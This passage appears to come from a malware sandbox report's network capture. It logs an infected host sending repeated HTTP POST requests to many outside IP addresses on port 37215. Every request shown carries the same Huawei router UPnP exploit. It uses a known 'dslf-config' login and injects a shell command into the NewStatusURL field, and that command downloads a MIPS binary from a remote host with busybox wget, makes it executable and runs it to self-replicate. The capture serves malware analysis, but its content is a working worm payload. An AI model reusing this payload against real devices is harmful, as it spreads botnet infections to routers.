                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2095192.168.2.136080441.201.182.2637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.713202953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2096192.168.2.1359536130.216.111.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.713521004 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2097192.168.2.1350466121.249.188.9637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.713638067 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2098192.168.2.135781841.159.198.737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.713973045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2099192.168.2.1350776107.68.115.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.715867996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2100192.168.2.1337666197.14.197.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.715877056 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2101192.168.2.134627041.121.25.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.715997934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2102192.168.2.1359540157.159.170.24437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.716097116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2103192.168.2.1336206157.169.127.2737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.716111898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2104192.168.2.134481841.75.55.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.716115952 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
